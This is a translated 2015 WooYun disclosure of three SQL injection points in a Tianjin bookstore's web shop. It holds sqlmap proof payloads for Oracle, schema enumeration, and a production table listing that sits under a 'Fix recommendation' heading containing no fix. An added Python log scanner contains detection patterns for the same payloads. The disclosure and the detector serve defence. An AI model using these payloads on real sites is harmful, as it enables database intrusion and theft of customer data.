Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0146021

Title: Three SQL injection points (bundled) in 天添网 (Tiantianwang), the online store of Tianjin Book Mansion (天津图书大厦)

Vendor: 天添网 (Tiantianwang)

Author: 路人甲 (Passerby A)

Submitted: 2015-10-12 09:41

Fixed: 2015-11-30 16:08

Disclosed: 2015-11-30 16:08

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability Details

Disclosure timeline:

2015-10-12: Details sent to the vendor; awaiting vendor handling
2015-10-16: Vendor confirmed; details visible to the vendor only
2015-10-26: Details disclosed to core white hats and domain experts
2015-11-05: Details disclosed to regular white hats
2015-11-15: Details disclosed to intern white hats
2015-11-30: Details disclosed to the public

Brief description:

As titled.

Detailed description:

http://**.**.**.**/icarttw/getSpxx.action?flid=1725&page=1&type=4


http://**.**.**.**/icarttw/getInfo.action?splx=1&spxxid=755026091&type=1


http://**.**.**.**/icarttw/listwsjg.action?zz=&cbsmc=&flags=&flag=10&flagc=&fxflid=0205060000&page=1


Proof of vulnerability:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: flid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: flid=1725 AND 5169=5169&page=1&type=4
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: flid=1725 AND 3922=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3922=3922) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)&page=1&type=4
Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: flid=1725 OR 9646=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(113)||CHR(80)||CHR(68),5)&page=1&type=4
---
[17:00:34] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[17:00:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[17:00:34] [INFO] fetching database (schema) names
[17:00:34] [INFO] the SQL query used returns 17 entries
[17:00:34] [INFO] resumed: COLLEGE
[17:00:34] [INFO] resumed: CTXSYS
[17:00:34] [INFO] resumed: DBSNMP
[17:00:34] [INFO] resumed: DMSYS
[17:00:34] [INFO] resumed: EXCHANGE
[17:00:34] [INFO] resumed: EXFSYS
[17:00:34] [INFO] resumed: MDSYS
[17:00:34] [INFO] resumed: OLAPSYS
[17:00:34] [INFO] resumed: ORDSYS
[17:00:34] [INFO] resumed: OUTLN
[17:00:34] [INFO] resumed: SCOTT
[17:00:34] [INFO] resumed: SYS
[17:00:34] [INFO] resumed: SYSMAN
[17:00:34] [INFO] resumed: SYSTEM
[17:00:34] [INFO] resumed: TSMSYS
[17:00:34] [INFO] resumed: WMSYS
[17:00:34] [INFO] resumed: XDB
available databases [17]:
[*] COLLEGE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXCHANGE
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
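An added detection example, not part of the original report: it scans constructed Nginx access-log lines (the sqlmap output above identifies the stack as Nginx + JSP on Oracle) for the three Oracle-specific injection signatures seen in the proof (boolean tautology, XMLType error-based, DBMS_PIPE time-based). The sample log lines, client IPs and the `scan_line`/`scan_log` names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Signatures for the three sqlmap techniques seen in the proof above (Oracle back end).
INDICATORS = {
    "boolean_tautology": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),
    "oracle_error_xmltype": re.compile(r"\bXMLType\s*\(", re.I),
    "oracle_time_dbms_pipe": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I),
    "chr_concat": re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|", re.I),
    "from_dual": re.compile(r"\bFROM\s+DUAL\b", re.I),
}

# Nginx "combined" access-log format: ip - user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" \d{3}')

# Constructed sample log (not taken from the report): three scanner requests, one normal request.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2015:17:00:34 +0800] "GET /icarttw/getSpxx.action?flid=1725%20AND%205169=5169&page=1&type=4 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
203.0.113.7 - - [12/Oct/2015:17:00:35 +0800] "GET /icarttw/getSpxx.action?flid=1725%20OR%209646=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(113),5)&page=1&type=4 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
203.0.113.7 - - [12/Oct/2015:17:00:36 +0800] "GET /icarttw/getSpxx.action?flid=1725%20AND%203922=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)))%20FROM%20DUAL)&page=1&type=4 HTTP/1.1" 500 312 "-" "sqlmap/1.0"
198.51.100.4 - - [12/Oct/2015:17:01:02 +0800] "GET /icarttw/getSpxx.action?flid=1725&page=1&type=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def scan_line(line):
    """Return (client_ip, path, {param: [indicator, ...]}) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a parseable access-log line
    path = m.group("path")
    query = path.partition("?")[2]
    hits = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            # parse_qs already decoded once; decode again to catch double-encoded payloads
            decoded = unquote_plus(value)
            found = [k for k, rx in INDICATORS.items() if rx.search(decoded)]
            if found:
                hits.setdefault(name, []).extend(found)
    return (m.group("ip"), path, hits) if hits else None

def scan_log(text):
    """Scan a whole log; returns suspicious (ip, path, hits) tuples in log order."""
    return [r for r in (scan_line(ln) for ln in text.splitlines()) if r]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, hits, path[:60])
```

Every flagged request in the sample comes from one client and hits the same parameter (`flid`), which is the pattern a WAF rule or SIEM correlation would key on; the per-parameter indicator list also tells the developer exactly which input reaches the query unparameterized.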


Fix recommendation:

Database: EXCHANGE
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| JT_WEBG_GYSSPMX | 3078001 |
| JT_WEBG_CGSHMX | 2372075 |
| JT_UPDATEUSERLOG_0904 | 2059741 |
| JT_J_SPXX | 1793627 |
| JT_J_SPXXSJBACK | 1717493 |
| XWQ_JT_J_SPXX_KC | 1415286 |
| JT_WEBG_GYSSPTZ | 1401730 |
| JT_J_SPXX_TP | 1243834 |
| XWQ_JT_J_SPXX | 1201511 |
| JT_WEBG_JTDMX | 1151380 |
| JT_J_SPXX20110512 | 912994 |
| JT_J_SPXX_2010_12_29 | 867858 |
| JT_J_SPXX_2010_12_30 | 867858 |
| HW_SPXX | 761691 |
| JT_J_SPXX_0201 | 739357 |
| SYSLOG | 609675 |
| TJBB_XSDMX | 401943 |
| JT_J_SPXX_KC | 390605 |
| JT_WEBK_XSDMX | 374935 |
| TJBB_FHDMX | 364540 |
| XWQ_SPXX2 | 337555 |
| JT_WEBG_CGSH | 331392 |
| TJBB_UPLOAD_TEMP_PRODUCTS | 320666 |
| JT_C_BMSPKFMX | 198512 |
| JT_J_SPXX_BM | 174326 |
| JT_C_BMSPKFTZ | 168233 |
| JT_UPDATEUSERLOG0908 | 166571 |
| T_LLJL | 166402 |
| TJBB_ZTSP | 165042 |
| JKXX_TJBB_XSDMX_BACK | 157905 |
| TJBB_XSZFRZ | 153807 |
| JT_WEBK_KHSPTZ | 150463 |
| TJBB_MANAGEDBLOG | 130362 |
| JT_J_SJHIS | 114881 |
| JT_WEBG_JTD | 114732 |
| JT_J_SPXX_BACK | 111700 |
| TJBB_XSD | 105876 |
| JT_J_SPXX_SPJJ | 99378 |
| TJBB_FHD | 94804 |
| JT_UPDATEUSERLOG_0903 | 83098 |
| TJBB_USERSXK | 77755 |
| TJBB_DXFSRZ | 72353 |
| TJBB_YXHD_PRODUCTS | 68317 |
| TJBB_USER | 66300 |
| HASSENDSMS | 45537 |
| T_SCJ | 36115 |
| JT_WEBK_USER | 36000 |
| JT_WEBG_CGDMX | 34597 |
| TJBB_DDSHR | 31556 |
| TJBB_FJDH | 28527 |
| TJBB_XSDQXTZ | 22703 |
| JT_WEBK_GGDJXX | 22258 |
| TEMP_RXSP1 | 21285 |
| T_SHDZ | 20598 |
| JT_WEBG_GYSJSDMX | 19914 |
| T_SHDZTMP | 18144 |
| TJBB_DTKRZ | 17562 |
| TJBB_KZSXNR | 16852 |
| CHECK_LOGIN | 16678 |
| T_GWC | 15086 |
| TJBB_TKRZ | 14112 |
| TJBB_DTK | 13994 |
| SPXX_TGTEMP | 13512 |
| JT_WEBK_SPXXREVIEW | 12321 |
| JT_WEBK_PHFLMX | 11284 |
| RT_SXK_RZ | 10701 |
| TEMP_BY_WXD_1 | 10694 |
| JT_WEBG_CGSHCC | 9828 |
| SYS_IMPORT_FULL_01 | 8979 |
| JT_WEBK_ROOMSPMX | 8621 |
| JT_WEBK_KHDDMX | 8565 |
| JT_J_SPXX_20110320 | 8517 |
| SYS_EXPORT_SCHEMA_84 | 7821 |
| TEMP_SPXX1 | 7809 |
| SYS_EXPORT_SCHEMA_83 | 7641 |
| SYS_EXPORT_SCHEMA_82 | 7514 |
| SYS_EXPORT_SCHEMA_81 | 7479 |
| SYS_EXPORT_SCHEMA_80 | 7374 |
| SYS_EXPORT_SCHEMA_79 | 7225 |
| SYS_EXPORT_SCHEMA_78 | 7213 |
| SYS_EXPORT_SCHEMA_77 | 7190 |
| SYS_EXPORT_SCHEMA_76 | 7172 |
| SYS_EXPORT_SCHEMA_75 | 7167 |
| SYS_EXPORT_SCHEMA_74 | 7158 |
| SYS_EXPORT_SCHEMA_73 | 7153 |
| SYS_EXPORT_SCHEMA_72 | 7143 |
| SYS_EXPORT_SCHEMA_71 | 7100 |
| SYS_EXPORT_SCHEMA_69 | 7072 |
| SYS_EXPORT_SCHEMA_70 | 7070 |
| SYS_EXPORT_SCHEMA_68 | 7057 |
| SYS_EXPORT_SCHEMA_67 | 7050 |
| SYS_EXPORT_SCHEMA_66 | 7048 |
| SYS_EXPORT_SCHEMA_65 | 7037 |
| SYS_EXPORT_SCHEMA_64 | 7028 |
| SYS_EXPORT_SCHEMA_63 | 7017 |
| SYS_EXPORT_SCHEMA_57 | 7015 |
| SYS_EXPORT_SCHEMA_62 | 7008 |
| SYS_EXPORT_SCHEMA_59 | 7002 |
| SYS_EXPORT_SCHEMA_61 | 7000 |
| SYS_EXPORT_SCHEMA_60 | 6992 |
| SYS_EXPORT_SCHEMA_58 | 6982 |
| SYS_EXPORT_SCHEMA_56 | 6960 |
| SYS_EXPORT_SCHEMA_55 | 6944 |
| SYS_EXPORT_SCHEMA_54 | 6936 |
| SYS_EXPORT_SCHEMA_53 | 6928 |
| SYS_EXPORT_SCHEMA_52 | 6920 |
| SYS_EXPORT_SCHEMA_51 | 6911 |
| SYS_EXPORT_SCHEMA_50 | 6905 |
| SYS_EXPORT_SCHEMA_49 | 6898 |
| SYS_EXPORT_SCHEMA_48 | 6883 |
| SYS_EXPORT_SCHEMA_47 | 6861 |
| SYS_EXPORT_SCHEMA_46 | 6853 |
| SYS_EXPORT_SCHEMA_45 | 6847 |
| SYS_EXPORT_SCHEMA_44 | 6840 |
| SYS_EXPORT_SCHEMA_43 | 6835 |
| SYS_EXPORT_SCHEMA_42 | 6827 |
| SYS_EXPORT_SCHEMA_41 | 6820 |
| SYS_EXPORT_SCHEMA_40 | 6812 |
| SYS_EXPORT_SCHEMA_39 | 6804 |
| SYS_EXPORT_SCHEMA_38 | 6797 |
| SYS_EXPORT_SCHEMA_37 | 6789 |
| SYS_EXPORT_SCHEMA_36 | 6781 |
| SYS_EXPORT_SCHEMA_35 | 6772 |
| SYS_EXPORT_SCHEMA_34 | 6763 |
| SYS_EXPORT_SCHEMA_33 | 6756 |
| SYS_EXPORT_SCHEMA_32 | 6749 |
| SYS_EXPORT_SCHEMA_31 | 6739 |
| SYS_EXPORT_SCHEMA_30 | 6731 |
| SYS_EXPORT_SCHEMA_29 | 6725 |
| SYS_EXPORT_SCHEMA_28 | 6717 |
| TJBB_WXD_GHSSP | 6642 |
| TJBB_WXD_QCKC | 6562 |
| TJBB_WXD_SPXX | 6559 |
| TJBB_SPXX | 6553 |
| SYS_EXPORT_SCHEMA_27 | 6511 |
| SYS_EXPORT_SCHEMA_26 | 6503 |
| SYS_EXPORT_SCHEMA_25 | 6471 |
| JT_WEBG_CGD | 6464 |
| SYS_EXPORT_SCHEMA_24 | 6463 |
| SYS_EXPORT_SCHEMA_22 | 6442 |
| SYS_EXPORT_SCHEMA_21 | 6434 |
| SYS_EXPORT_SCHEMA_20 | 6427 |


Copyright notice: when reposting, credit the source 路人甲@乌云 (Passerby A @ WooYun)


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-16 16:07

Vendor reply:

CNVD confirmed and reproduced the described vulnerability; it has been forwarded to CNCERT for dispatch to the corresponding branch center, which will coordinate follow-up handling with the website's operating organization.

Latest status:

None yet